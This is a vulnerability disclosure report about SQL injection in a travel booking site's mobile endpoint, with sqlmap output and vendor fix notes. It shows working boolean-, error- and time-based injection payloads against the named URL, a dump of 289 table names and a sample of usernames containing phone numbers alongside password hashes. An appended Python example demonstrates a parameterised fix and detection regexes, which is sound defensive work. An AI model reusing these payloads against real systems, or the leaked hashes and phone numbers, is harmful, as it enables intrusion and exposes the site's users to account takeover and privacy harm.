2015-10-02: Details reported to the vendor; awaiting vendor handling
2015-10-08: Vendor confirmed; details disclosed to the vendor only
2015-10-08: Vendor fixed the vulnerability and disclosed it proactively; details made public

I can't do anything else, all I know is scanning for injection..
http://m.zyql.cn/?m=android/scenic.scenicDetail&id=64
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=android/scenic.scenicDetail&id=64 AND 1812=1812

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=android/scenic.scenicDetail&id=64 AND (SELECT 3290 FROM(SELECT COUNT(*),CONCAT(0x3a7267763a,(SELECT (CASE WHEN (3290=3290) THEN 1 ELSE 0 END)),0x3a7365633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=android/scenic.scenicDetail&id=64 AND SLEEP(5)
---
[289 tables]
+----------------------------------------+
| api_publish                            |
| btob_api_push                          |
| btob_btoc_scenic_ticket_reserve_config |
| btob_consume                           |
| btob_finance                           |
| btob_level                             |
| btob_member                            |
| btob_member_authority                  |
| btob_member_log                        |
| btob_money_log                         |
| btob_msg_log                           |
| btob_notice                            |
| btob_order                             |
| btob_order_log                         |
| btob_order_reserve                     |
| btob_order_reserve_cashback            |
| btob_order_return                      |
| btob_pay                               |
| btob_pay_log                           |
| btob_print_log                         |
| btob_push_task_list                    |
| btob_reverse                           |
| btob_scenic                            |
| btob_scenic_ticket                     |
| btob_scenic_type                       |
| btob_verify_push_zyql                  |
| ecs_region                             |
| ecs_scenic                             |
| ecs_scenic_admin                       |
| ecs_scenic_comment                     |
| ecs_scenic_order                       |
| ecs_scenic_order_ticket                |
| ecs_scenic_ticket                      |
| ecs_sms_logs                           |
| ecs_users                              |
| el_brand                               |
| el_hotel                               |
| el_hoteldetail                         |
| el_hotelorder                          |
| el_hotelorderrate                      |
| el_image                               |
| el_poi                                 |
| el_poi_copy                            |
| el_room                                |
| el_tmporderinfo                        |
| jd_ad                                  |
| jd_admin                               |
| jd_adminlog                            |
| jd_admintype                           |
| jd_article                             |
| jd_article_class                       |
| jd_chain                               |
| jd_chainnum                            |
| jd_city                                |
| jd_flink                               |
| jd_hotel                               |
| jd_hotel_api                           |
| jd_keywords                            |
| jd_layout                              |
| jd_module                              |
| jd_ncity                               |
| jd_purview                             |
| jd_rewrite                             |
| jd_sysconfig                           |
| jd_usergroup                           |
| my_activity                            |
| my_activity_comment                    |
| my_admin                               |
| my_admin_log                           |
| my_appmoney                            |
| my_area_blacklist                      |
| my_article                             |
| my_authorize                           |
| my_bonus_send                          |
| my_bonus_type                          |
| my_comment                             |
| my_comment_impression                  |
| my_delta                               |
| my_dict_roomprice                      |
| my_elong_blacklist                     |
| my_finance                             |
| my_finance_log                         |
| my_hotel                               |
| my_level                               |
| my_line                                |
| my_line_comment                        |
| my_member                              |
| my_module                              |
| my_msg_log                             |
| my_msg_times                           |
| my_nopay                               |
| my_order_activity                      |
| my_order_line                          |
| my_order_log_zypw                      |
| my_order_room                          |
| my_order_rural                         |
| my_order_scenic                        |
| my_order_scenic_813                    |
| my_order_scenic_828                    |
| my_order_scenic_i                      |
| my_order_scenic_zhj                    |
| my_order_scenic_zhj_0901               |
| my_order_scenic_zhj_copy               |
| my_pay                                 |
| my_photo                               |
| my_publish                             |
| my_question                            |
| my_raiders                             |
| my_reply                               |
| my_room                                |
| my_rural                               |
| my_rural_admin                         |
| my_rural_comment                       |
| my_rural_price                         |
| my_rural_stock                         |
| my_rural_ticket                        |
| my_rural_type                          |
| my_sale                                |
| my_scenic                              |
| my_scenic_admin                        |
| my_scenic_comment                      |
| my_scenic_price                        |
| my_scenic_stock                        |
| my_scenic_ticket                       |
| my_scenic_type                         |
| my_seckill_order_scenic                |
| my_seckill_order_scenic_log            |
| my_seckill_ticket                      |
| my_service                             |
| my_special_price                       |
| my_stock                               |
| my_trace                               |
| my_type                                |
| t_system_failedlogins                  |
| t_system_log                           |
| t_system_memberfields                  |
| t_system_members                       |
| t_system_onlinetime                    |
| t_system_report                        |
| t_system_robot                         |
| t_system_robot_ip                      |
| t_system_robot_log                     |
| t_system_role                          |
| t_system_role_action                   |
| t_system_role_module                   |
| t_system_sessions                      |
| t_tttuangou_address                    |
| t_tttuangou_api_apps                   |
| t_tttuangou_api_protocol               |
| t_tttuangou_api_session                |
| t_tttuangou_article                    |
| t_tttuangou_attrs                      |
| t_tttuangou_attrs_cat                  |
| t_tttuangou_attrs_order                |
| t_tttuangou_catalog                    |
| t_tttuangou_city                       |
| t_tttuangou_city_place                 |
| t_tttuangou_comments                   |
| t_tttuangou_express                    |
| t_tttuangou_express_area               |
| t_tttuangou_express_cdp                |
| t_tttuangou_express_corp               |
| t_tttuangou_express_printer_log        |
| t_tttuangou_finder                     |
| t_tttuangou_metas                      |
| t_tttuangou_order                      |
| t_tttuangou_order_clog                 |
| t_tttuangou_paylog                     |
| t_tttuangou_payment                    |
| t_tttuangou_prize_phone                |
| t_tttuangou_prize_ticket               |
| t_tttuangou_prize_ticket_win           |
| t_tttuangou_product                    |
| t_tttuangou_push_log                   |
| t_tttuangou_push_queue                 |
| t_tttuangou_push_template              |
| t_tttuangou_question                   |
| t_tttuangou_recharge_card              |
| t_tttuangou_recharge_order             |
| t_tttuangou_regions                    |
| t_tttuangou_reports                    |
| t_tttuangou_seller                     |
| t_tttuangou_service                    |
| t_tttuangou_subscribe                  |
| t_tttuangou_ticket                     |
| t_tttuangou_uploads                    |
| t_tttuangou_usermoney                  |
| t_tttuangou_usermsg                    |
| t_tttuangou_zlog                       |
| tao_cancel                             |
| tao_consume_logs                       |
| tao_order                              |
| tao_resend                             |
| tao_reverse                            |
| v9_ad                                  |
| v9_ad_data                             |
| v9_admin                               |
| v9_admin_panel                         |
| v9_admin_role                          |
| v9_admin_role_priv                     |
| v9_attachment                          |
| v9_attachment_index                    |
| v9_badword                             |
| v9_block                               |
| v9_block_history                       |
| v9_block_priv                          |
| v9_cache                               |
| v9_category                            |
| v9_category_priv                       |
| v9_collection_content                  |
| v9_collection_history                  |
| v9_collection_node                     |
| v9_collection_program                  |
| v9_content_check                       |
| v9_copyfrom                            |
| v9_datacall                            |
| v9_dbsource                            |
| v9_download                            |
| v9_download_data                       |
| v9_downservers                         |
| v9_extend_setting                      |
| v9_favorite                            |
| v9_hits                                |
| v9_ipbanned                            |
| v9_keylink                             |
| v9_keyword                             |
| v9_keyword_data                        |
| v9_linkage                             |
| v9_log                                 |
| v9_member                              |
| v9_member_detail                       |
| v9_member_group                        |
| v9_member_menu                         |
| v9_member_verify                       |
| v9_member_vip                          |
| v9_menu                                |
| v9_model                               |
| v9_model_field                         |
| v9_module                              |
| v9_news                                |
| v9_news_data                           |
| v9_page                                |
| v9_pay_account                         |
| v9_pay_payment                         |
| v9_pay_spend                           |
| v9_picture                             |
| v9_picture_data                        |
| v9_position                            |
| v9_position_data                       |
| v9_poster                              |
| v9_poster_201402                       |
| v9_poster_201403                       |
| v9_poster_201404                       |
| v9_poster_201406                       |
| v9_poster_201407                       |
| v9_poster_201408                       |
| v9_poster_201409                       |
| v9_poster_201410                       |
| v9_poster_201412                       |
| v9_poster_201505                       |
| v9_poster_201509                       |
| v9_poster_space                        |
| v9_queue                               |
| v9_release_point                       |
| v9_search                              |
| v9_search_keyword                      |
| v9_session                             |
| v9_site                                |
| v9_special                             |
| v9_special_c_data                      |
| v9_special_content                     |
| v9_sphinx_counter                      |
| v9_sso_admin                           |
| v9_sso_applications                    |
| v9_sso_members                         |
| v9_sso_messagequeue                    |
| v9_sso_session                         |
| v9_sso_settings                        |
| v9_template_bak                        |
| v9_times                               |
| v9_type                                |
| v9_urlrule                             |
| v9_video                               |
| v9_video_content                       |
| v9_video_data                          |
| v9_video_store                         |
| v9_workflow                            |
| v9_zyqlproduct                         |
| v9_zyqlproduct_data                    |
+----------------------------------------+
Randomly read a few users...

+----------------------------------+-----------------+
| password                         | user_name       |
+----------------------------------+-----------------+
| a3545bd79d31f9a72d3a78690adf73fc | zsd_15692397606 |
| a35d11c2f995c60b0341a9c777f1ae03 | zsd_13964145843 |
| a35d11c2f995c60b0341a9c777f1ae03 | zsd_13730971688 |
| a35e47afa1d3e418e42a24151e0ac4e1 | lizhenq         |
| a35f4223bb8f6c8638dc91d94e9b16f5 | zsd_15605433688 |
| a35f4223bb8f6c8638dc91d94e9b16f5 | zsd_15550442702 |
| a35fe7f7fe8217b4369a0af4244d1fca | zsd_13906332915 |
| a368b0de8b91cfb3f91892fbf1ebd4b2 | zsd_13863520806 |
| a36adbc35e69b22acbf9f834a0deb286 | zsd_15953797189 |
| a36b0dcd1e6384abc0e1867860ad3ee3 | zsd_15269992087 |
| a36b0dcd1e6384abc0e1867860ad3ee3 | zsd_18364112339 |
| a36b598abb934e4528412e5a2127b931 | zsd_13573368888 |
| a36e841c5230a79c2102036d2e259848 | zsd_15615316666 |
| a36e841c5230a79c2102036d2e259848 | zsd_13792174520 |
| a376033f78e144f494bfc743c0be3330 | zsd_13325091256 |
| a376802c0811f1b9088828288eb0d3f0 | zsd_13563733690 |
| a376802c0811f1b9088828288eb0d3f0 | zsd_18643584676 |
| a3788c8c64fd65c470e23e7534c3ebc8 | zsd_13287720902 |
| a37e0e39e1495a423b9d86bc058e9c27 | ????            |
| a381c2c35c9157f6b67fd07d5a200ae1 | zsd_18766944270 |
| a381c2c35c9157f6b67fd07d5a200ae1 | zsd_18754196080 |
+----------------------------------+-----------------+
Filter, filter, filter!

Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2015-10-08 11:36
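As an added illustration, not code from the original report or from the vendor, the Python script below uses SQLite to show why the boolean-based blind probe in the sqlmap output above works when the id parameter is pasted into the query as SQL text, and why validating it as an integer and binding it as a query parameter (the "filtering" the fix note refers to) removes that oracle. It also classifies the three payload shapes from the report when they appear in a query string, which is useful when reviewing access logs. The table name `scenic`, its columns, the rows, the regexes and all function names are hypothetical; MySQL-only functions such as SLEEP and FLOOR(RAND(0)*2) are only pattern-matched, never executed, because SQLite does not have them.

```python
import re
import sqlite3
from urllib.parse import parse_qs


def make_db():
    """Constructed in-memory stand-in for the site's scenic-spot table (hypothetical schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE scenic (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany(
        "INSERT INTO scenic VALUES (?, ?)",
        [(63, "spot-63"), (64, "spot-64"), (65, "spot-65")],
    )
    return con


def scenic_detail_vulnerable(con, raw_id):
    """The flaw the report describes: the GET parameter becomes part of the SQL text."""
    sql = "SELECT name FROM scenic WHERE id=" + raw_id
    return [row[0] for row in con.execute(sql)]


ID_RE = re.compile(r"[0-9]{1,10}")


def scenic_detail_hardened(con, raw_id):
    """Hardened handler: the parameter must be a decimal integer and is bound, never concatenated."""
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("id must be a decimal integer")
    return [row[0] for row in con.execute("SELECT name FROM scenic WHERE id=?", (int(raw_id),))]


def has_boolean_oracle(handler, con):
    """True when a true and a false appended condition yield different responses,
    which is exactly the difference a boolean-based blind probe measures."""
    def run(payload):
        try:
            return ("ok", handler(con, payload))
        except ValueError:
            return ("rejected", None)
    return run("64 AND 1812=1812") != run("64 AND 1812=1813")


# Constructed signatures for the three payload shapes shown in the sqlmap output above.
SQLI_SIGNATURES = {
    "boolean-based": re.compile(r"\bAND\s+\d+=\d+", re.I),
    "error-based": re.compile(r"FLOOR\(RAND\(0\)\*2\)", re.I),
    "time-based": re.compile(r"\bSLEEP\(\d+\)", re.I),
}


def classify_id_param(query_string):
    """Return the signature labels matching the id parameter of a query string (for log review)."""
    hits = []
    for value in parse_qs(query_string).get("id", []):
        for label, pattern in SQLI_SIGNATURES.items():
            if pattern.search(value):
                hits.append(label)
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler exposes a boolean oracle:", has_boolean_oracle(scenic_detail_vulnerable, db))
    print("hardened handler exposes a boolean oracle:", has_boolean_oracle(scenic_detail_hardened, db))
    print(classify_id_param("m=android/scenic.scenicDetail&id=64 AND SLEEP(5)"))
```

The hardened handler rejects anything that is not a plain integer before the database sees it, and even if a value did get through, the `?` placeholder keeps it a value rather than SQL. The signature list only covers the three shapes in this report; a real log review would treat any non-numeric id on this endpoint as suspicious, which the integer check above already does.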
Thanks to all the 路人甲 (anonymous reporters). The boss rushed to the scene immediately and personally admonished the developers; the developers are currently emotionally stable.

2015-10-08: Filtering added; continuing to review the code.
2015-10-08: Fixed.